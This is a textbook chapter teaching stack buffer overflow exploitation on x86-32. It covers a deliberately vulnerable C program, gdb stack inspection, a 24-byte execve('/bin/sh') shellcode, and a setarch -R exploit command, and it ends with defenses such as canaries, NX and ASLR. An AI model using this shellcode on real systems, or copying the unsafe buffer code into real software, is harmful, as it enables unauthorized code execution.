Buffer Overflow
A buffer overflow example
In this chapter we will learn in detail what a buffer overflow is, and how to exploit it on x86-32 system architectures. The right approach to study this chapter is to reproduce each step on your own machine. You should be able to eventually achieve exploiting a buffer overflow on your own machine; details of addresses value would be different, but the logic is the same.
Let’s start with the following program:
#include <stdio.h>
#include <stdlib.h>
char *
gets(char *buf) {
int c;
while((c = getchar()) != EOF && c != '\n')
*buf++ = c;
*buf = '\0';
return buf;
}
int
read_req(void) {
char buf[10];
int i;
gets(buf);
i = atoi(buf);
return i;
}
int
main() {
int x = read_req();
printf("x = %d\n", x);
}
One can compile it as follows:
$ gcc -g -m32 -fno-stack-protector unsafe_ex1.c -o unsafe_ex1
This code contains an exploitable buffer overflow. This chapter’s goal is to learn how exploitation may arise from such a vulnerability, and what defense may be used.
Understanding how to exploit a buffer overflow may be tricky the first time. It involves low-level assembly, debuggers, a pinch of logic, and some curiosity. We’ll do this step by step.
If one looks into the code, one may conclude that buf’s memory lies on
the function’s stack frame; we just don’t know where on the stack
frame. Theoretically the compiler could decide to put the beginning of
the buffer close to the value %ebp in pointing to, and let the buffer
fills towards lower addresses. It could also put the beginning of the
buffer at lower address, and grows towards higher address.
Since we don’t know, let’s check what the compiler is doing!
$ gdb unsafe_ex1
break read_req ; put a breakpoint of read_reaq call.
r ; run the code
Start by using the gdb debugger to load the program. Break over the
read_req symbol (that’s why compiling should have -g option to
generate these symbols into the binary).
Do the following:
Breakpoint 1, read_req () at unsafe_ex1.c:17
17 gets(buf);
(gdb) print &buf
$2 = (char (*)[10]) 0xffffd0b2
(gdb) info reg
eax 0x5655623c 1448436284
ecx 0xffffd100 -12032
edx 0xffffd120 -12000
ebx 0x56558fd0 1448447952
esp 0xffffd0b0 0xffffd0b0
ebp 0xffffd0c8 0xffffd0c8
...
This allows to understand a bit how the function stack’s frame looks
like in memory. We have information about the main registers, and we
know where buf is located, just above %esp:
+------------------+
| main()'s frame |
| |
| |
read_req() frame ----> +------------------+
| return address | 4 bytes
%ebp ------> +------------------+
| saved %ebp | 4 bytes
+------------------+
| i | 4 bytes
+------------------+
| ... |
+------------------+
| buf[10] |
| ... |
| buf[0] | 1 byte
| | 1 byte
| | 1 byte
%esp ------> +------------------+
The x86 stack grows down in addresses but the buffer grows up in address, so it looks reversed on the stack frame.
We can also observe that the stack frame is aligned on a 4-byte
boundary. %ebp is pointing to 0xffffd0c8. %esp is at 0xffffd0b0.
There are 24 bytes in between, and 4 more bytes above %ebp, totalling
to 28 bytes. Aligning 4-bytes data to 4-bytes boundary avoids data to
spill over 2 cache entries.
So, the buffer grows towards the beginning of the stack frame. We may also look
into the values saved on the stack below %ebp:
(gdb) x/xw $ebp
0xffffd0c8: 0xffffd0e8
We read one word (x/xw), so 32-bits, below %ebp. The value is
0xffffd0e8, which is the %ebp value of main()’s frame.
What about the return address? Let’s take an offset of $ebp, towards
higher address as the stack drawing displays:
(gdb) x/xw $ebp+4
0xffffd0cc: 0x5655625e
So, at address 0xffffd0cc, we find the value 0x5655625e. This value
is expected to be the address of the instruction to execute right after
returning from the function. Let’s disassemble main’s stack frame to
check for that:
(gdb) disas main
Dump of assembler code for function main:
0x5655623c <+0>: lea 0x4(%esp),%ecx
0x56556240 <+4>: and $0xfffffff0,%esp
0x56556243 <+7>: push -0x4(%ecx)
0x56556246 <+10>: push %ebp
0x56556247 <+11>: mov %esp,%ebp
0x56556249 <+13>: push %ebx
0x5655624a <+14>: push %ecx
0x5655624b <+15>: sub $0x10,%esp
0x5655624e <+18>: call 0x565560c0 <__x86.get_pc_thunk.bx>
0x56556253 <+23>: add $0x2d7d,%ebx
0x56556259 <+29>: call 0x56556201 <read_req>
0x5655625e <+34>: mov %eax,-0xc(%ebp)
0x56556261 <+37>: sub $0x8,%esp
0x56556264 <+40>: push -0xc(%ebp)
0x56556267 <+43>: lea -0x1fc8(%ebx),%eax
0x5655626d <+49>: push %eax
0x5655626e <+50>: call 0x56556050 <printf@plt>
0x56556273 <+55>: add $0x10,%esp
0x56556276 <+58>: mov $0x0,%eax
0x5655627b <+63>: lea -0x8(%ebp),%esp
0x5655627e <+66>: pop %ecx
0x5655627f <+67>: pop %ebx
0x56556280 <+68>: pop %ebp
0x56556281 <+69>: lea -0x4(%ecx),%esp
0x56556284 <+72>: ret
End of assembler dump.
On the left, we have the address where main’s code is stored. Indeed, the
instruction next to the call of read_req is at 0x5655625e.
Tip
If we can control the return address, we can manipulate execution! But can we?
$ Breakpoint 1, read_req () at unsafe_ex1.c:17
$ 17 gets(buf);
$ (gdb) cont
$ Continuing.
$ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$ Program received signal SIGSEGV, Segmentation fault.
$ 0x41414141 in ?? ()
0x41 is the ascii value of ‘A’ (4*16 + 1 in base 10; as one may observe within an ASCII table). So it looks like the program crashed because it tried to jump to 0xAAAA = 0x41414141
Tip
How many A’s should we input to override the return address but nothing over it?
We can compute directly from looking at the stack drawing, or from gdb:
(gdb) print $ebp+4 - $esp+2
$1 = 30
So we need to input 30 A’s.
(gdb) r
Breakpoint 1, read_req () at unsafe_ex1.c:17
17 gets(buf);
(gdb) next
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(gdb) x/xw $ebp+4
0xffffd0cc: 0x41414141
Success, we can control the return address, so we can indirectly control
the $eip register since the RET instruction at the end of the
function updates $eip with what is stored at address 0xffffd0cc.
You may try to use stepi or next in gdb until the RET
instruction executes. stepi would execute instruction-per-instruction.
Once RET executes, one can observe the %eip value, doing:
(gdb) info reg
eax 0x0 0
ecx 0x0 0
edx 0xa 10
ebx 0x41414141 1094795585
esp 0xffffd0d0 0xffffd0d0
ebp 0x41414141 0x41414141
esi 0xffffd1b4 -11852
edi 0xf7ffcb80 -134231168
eip 0x41414141 0x41414141
It contains value 0x41414141; so we’re indeed able to control its content using a buffer overflow. We know how to jump ‘somewhere’. Our goal is to execute arbitrary code; we still have some missing piece.
Tip
Idea! We could fill the buffer with code instead of ‘A’ and override the return address with the address of the buffer holding the code.
Code is nothing else than data; and we have some space we control (the
buffer) to put data. We put many ’A’s, but we could fill it with
something useful instead, like x86-32 instructions and execute them
thanks to our control over $eip.
Controlling %eip
So, the plan is as follows:
-
Write x86-32 instructions in buf, on the stack.
-
Learn what is the address value &buf.
-
Overflow buf and re-write the return address with the address &buf.
+------------------+
| main()'s frame |
| |
| |
read_req() frame ----> +------------------+
| &buf | We put address of buf here!
%ebp ------> +------------------+
| saved %ebp | 4 bytes
+------------------+
| i | 4 bytes
+------------------+
| ... |
+------------------+
| buf[10] | ...
| ... | 2nd byte of malicious code
| buf[0] | 1st byte of malicious code
| | 1 byte
| | 1 byte
%esp ------> +------------------+
So we can fill the buffer with any instruction we want. The classic
example is making the program spawn a shell. A shell is a command-line
interpreter on Unix-based system, which comes installed by default on
any Unix, located in /bin/sh. It is useful to launch other programs.
In summary, we want to exploit a program X with a buffer overflow
vulnerability, and insert a program Y within X that potentially allows
us to execute any program Zonce Y gets executed by X’s manipulated
return address.
Reverse engineering of execve
Let’s focus on Y, i.e., we can write a program Y that executes
programs using the syscall execve(), and it is rather simple:
int main()
{
char *shell[2];
shell[0] = "/bin/sh";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
Compiling and executing gives a shell:
$ gcc -m32 shell.c -o shell
$ ./shell
$
The program is indeed swapped to another (a shell), as execve()’s
documentation into the Linux’s programmer manual says (man 2 execve).
So ideally, we want to inject something similar to program X, but we
cannot inject this shell program as is. Why?
What we execute (shell) is not only code, it is a ELF binary. We only
want the x86-32 instructions. Necessary information like “/bin/sh” is stored inside the
.rodata segment of program shell, and the vulnerable program that we wish to
attack likely does not have “/bin/sh” into its .rodata, so the code
within shell is not portable to the targeted binary. Even if we could
execute shell’s code in the context of the victim program, it would not
work.
However, we can study shell’s code instructions to design portable instructions to call execve(). That’s a small step into reverse engineering, so bear with me, it’s getting slightly more complex here.
Let’s run shell within a debugger:
$ gdb shell
Reading symbols from shell...
$ (gdb) break execve
Breakpoint 1 at 0x1060
$ (gdb) run
Breakpoint 1, 0xf7e51870 in execve () from /lib/i386-linux-gnu/libc.so.6
$ (gdb) disas execve
Dump of assembler code for function execve:
=> 0xf7e51870 <+0>: endbr32
0xf7e51874 <+4>: push %ebx
0xf7e51875 <+5>: mov 0x10(%esp),%edx
0xf7e51879 <+9>: mov 0xc(%esp),%ecx
0xf7e5187d <+13>: mov 0x8(%esp),%ebx
0xf7e51881 <+17>: mov $0xb,%eax
0xf7e51886 <+22>: call *%gs:0x10
0xf7e5188d <+29>: pop %ebx
0xf7e5188e <+30>: cmp $0xfffff001,%eax
0xf7e51893 <+35>: jae 0xf7d946d0
0xf7e51899 <+41>: ret
$ (gdb) stepi ; let's move forward by two instructions to inspect our registers
$ (gdb) stepi
(gdb) disas execve
Dump of assembler code for function execve:
0xf7e51870 <+0>: endbr32
0xf7e51874 <+4>: push %ebx
=> 0xf7e51875 <+5>: mov 0x10(%esp),%edx
0xf7e51879 <+9>: mov 0xc(%esp),%ecx
0xf7e5187d <+13>: mov 0x8(%esp),%ebx
0xf7e51881 <+17>: mov $0xb,%eax
0xf7e51886 <+22>: call *%gs:0x10
0xf7e5188d <+29>: pop %ebx
0xf7e5188e <+30>: cmp $0xfffff001,%eax
0xf7e51893 <+35>: jae 0xf7d946d0
0xf7e51899 <+41>: ret
Looking at the instructions within execve, we’re putting something
into edx located at 0x10 above %esp.
Warning
execve’s code is not compiled by us; it is part of the standard library compiled by the linux image’s developers. It is compiled with optimizations enabled, so its code may look strange.
We know thanks to the cdecl convention that main’s code pushed the arguments of execve to the stack in reverse orders.
=> 0xf7e51875 <+5>: mov 0x10(%esp),%edx
$ (gdb) x/wx $esp+0x10 ; let's dereference $esp+0x10 (careful, it means $esp+16 in base10)
0xffffd0b8: 0x00000000
That is, %edx gets the NULL value. (0x00000000) as per needed by execve’s
parameters.
Next we have:
0xf7e51879 <+9>: mov 0xc(%esp),%ecx
$ (gdb) x/xw $esp+0xc
0xffffd0b4: 0xffffd0c4
0xffffd0c4 points to the char *shell[2] array, which is an array of two
pointers towards chars. Finally,
0xf7e5187d <+13>: mov 0x8(%esp),%ebx
put the pointer to “/bin/sh” into $ebx.
$ (gdb) x/xw $esp+0x8
0xffffd0b0: 0x56557008
0x565557008 is the address of “/bin/sh” contained in the segment
.rodata. You may verify this by reading the segment:
$ readelf -x .rodata shell
Vidange hexadécimale de la section « .rodata » :
0x00002000 03000000 01000200 2f62696e 2f736800 ......../bin/sh.
Eventually, the following instruction
0xf7e51881 <+17>: mov $0xb,%eax
copies the syscall execve()’s id (0xb) to %eax, and call it on the next
instruction.
Shellcode: building the exploit
So that we know how execve() works, we can try to write the necessary information it needs with the code we send. The ‘malicious’ code would then have two objectives:
- Prepare the preamble of execve()
- call excecve() to get a shell
This is called a shellcode. Most of the difficulty is in 1). We have to
prepare and put on the victim’s stack the needed arguments ourself and load
%ecx, %ebx and %edx with the appropriate value before calling
execve():
xorl %eax, %eax ; create a NULL value and put it in %eax
push %eax ; push NULL on the stack
push $0x68732f2f ; Observe this is /sh reversed with an extra '/' (hs//)
push $0x6e69622f ; Observe this is the bytes /bin reversed (nib/)
mov %esp, $ebx ; $ebx now points to /bin//sh
push %eax ; other NULL parameter needed to execve()
push %ebx ; save pointer to /bin//sh\0 on the stack (execve()'s argument)
mov %esp, %ecx ; %ecx points to (/bin/ssh)\0 (the shell array)
mov %eax, %edx ; 0x00000000 in %edx
movb $0x0b, %al ; %al is the lower 8 bits of %ecx
call *gs:0x10 ;
We can test is using a small C program and the instructions transformed to opcodes (i.e., the hexadecimal representation of each instruction).
void foo(int ptr) {
int *ret;
ret = (int *)&ret + 2; // Pointer arithmetic assumes the size of the pointee
// So here +2 means + 2*sizeof(int) = 8.
// i.e., location of &ret + 8 bytes assuming
// compiled with -fno-stack-protector
*ret = ptr;
}
int main()
{
char sc[]= /* 29 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
/*"\x65\xff\x15\x10\x00\x00\x00" [> call *%gs:0x10 <]*/
foo((int)sc);
return 0;
}
Compiling:
gcc -m32 -z execstack -fno-stack-protector shellcode.c -o shellcode
$ ./shellcode
$
It works! The program spawned another program (our new shell) through execve(). We could test it over our vulnerable program. To simplify our little example, we modify the vulnerable program to read data from the program’s input rather than through reading stdin.
#include <stdio.h>
#include <stdlib.h>
static const int MAX_SIZE = 255;
char *
gets(char *buf, char *input) {
int c;
int i = 0;
while((c = input[i]) != '\0' && i < MAX_SIZE) {
i++;
*buf++ = c;
}
*buf = '\0';
return buf;
}
int
read_req(char *input) {
char buf[24];
int i;
gets(buf, input);
i = atoi(buf);
return i;
}
int
main(int arcgc, char **argv) {
int x = read_req(argv[1]);
printf("x = %d\n", x);
}
We also increased the buffer size; it needs being able to hold the whole exploit (24 bytes of instructions). Also, the gets() function now does check for EOF; this symbol has value \xff on some system, which happens to be part of the address we want to jump to. The original code would not override the return address with \xff because of that.
Compile it:
gcc -g -m32 -z execstack -fno-stack-protector unsafe_ex2.c -o unsafe
Tip
All vulnerabilities are not necessary exploitable! If the buffer cannot hold all the necessary code to spawn our shell, it can’t be used this way (although, other tricks that we won’t cover exist, but the argument stands nonetheless).
To exploit the vulnerability, we can do the following:
setarch -R ./unsafe $(printf '<shellcode><padding><buf addr>')
setarch -R deactivates a defense existing on modern OSes to simplify exploitation.
<shellcode> = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
<padding> = X bytes NOPs = “\x90” as our padding. 0x90 is the
x86-32 instruction for ‘no instruction’ called NOP. You can put
anything as padding, usually you’ll find examples using ‘A’ used after
the shellcode. But if you want padding before the shellcode, that works
too, NOP must be used.
<buf addr> = 4 bytes to override the return address with the address of the buffer.
So, two values have to be guessed. The number of bytes to pad up to the return address can be obtained from reading the code and guessing how much many bytes the compiler will allocate to the stack, knowing the stack’s frame.
The main problem is the address of the buffer on the stack. In a real exploitation scenario, it is not trivial to guess. We usually need an information leakage primitive (another kind of exploit) to get the address of the stack within some part of the program.
For this exercise, you can get it from gdb, or from printing it in the program, e.g., writing in the function read_req():
printf("the address of buf is %p\n", buf);
Be careful that printf allocates elements on the stack as well, so it
may change the distance between %esp and %ebp.
Eventually, we have to find the right length of the shellcode to override the return address, and the right value of the return address. One way to help iterate towards the solution is to write your shellcode within a file using printf:
printf "<shellcode><padding><addr>" > shellcode.bin
That way, the binary values of the shellcode is stored. Then launch gdb, execute the vulnerable program with as argument, the binary output of you file:
setarch -R gdb unsafe
$ (gdb) run $(cat shellcode.bin)
and use break point for anything unclear. It is likely that you get wrong the size of the padding or the address at the first try. The debugger would help you inspect the memory to get all of this right. This may feel difficult for some, but such practice is useful in many other scenarios, and hopefully help understanding what’s going on :-)
Pay attention to the <buf addr> (e.g., 0xffffd0d8). You’ll need to
write it in reverse. This is due to the endianness of x86 machines. Most
systems are little-endian today, meaning that the least-significant byte
is stored at the smallest address. Since the buffer is growing up, as do
the addresses in x86, we need to store a 32-bits on the stack such that
the least-significant byte is at the lowest address value.
Defending Buffer Overflow exploits
-
“The dev must learn to code better?” Nope. Culpability is not helpful.
-
We could save the return address of a function within another location, and compare to it before returning?
In the early 2000’s, the StackShield dev tool was modifying the compiled code to copy the RET address into the beginning of the .data segment during function prologue. The function epilogue would check whether the function’s RET value would differ from the value in the .data segment. If the values were different, the program would terminate.StackGuard is a similar idea than StackShield – A random value would be chosen by the program at the beginning of its execution, and pushed to the stack during a function’s prologue, on top of the return address. The random value would also be stored in a safe location, called a canary. During the function epilogue, the program would check whether the stack guard matches the canary, and terminate the program if it does not.
-
Hardware defense + OS support:
Modern CPUs with 64-bits support usually have a feature called the NX bit (No-eXecute bit) within memory address. I.e., one bit of the pointer would tell the CPU control unit whether it can execute or not the instruction located at the given address. OSes like Windows, Linux, MAC OS, etc. use this feature to mark certain randomize the memory layout such that each execution of the program uses different part of the memory. Guessing the buffer’s address becomes significantly harder. -
Program Static/Dynamic Analyzer
Tools aiming to warn the developers during compilation, or while running tests that unsafe operations are performed. -
Safe programming language
Languages like Python or Java provide memory bound checking at runtime which automatically detect and prevent the execution of unsafe memory operations. The program however halts.
Better languages like Rust can offer to developers the same performance than C but with memory safety guarantees.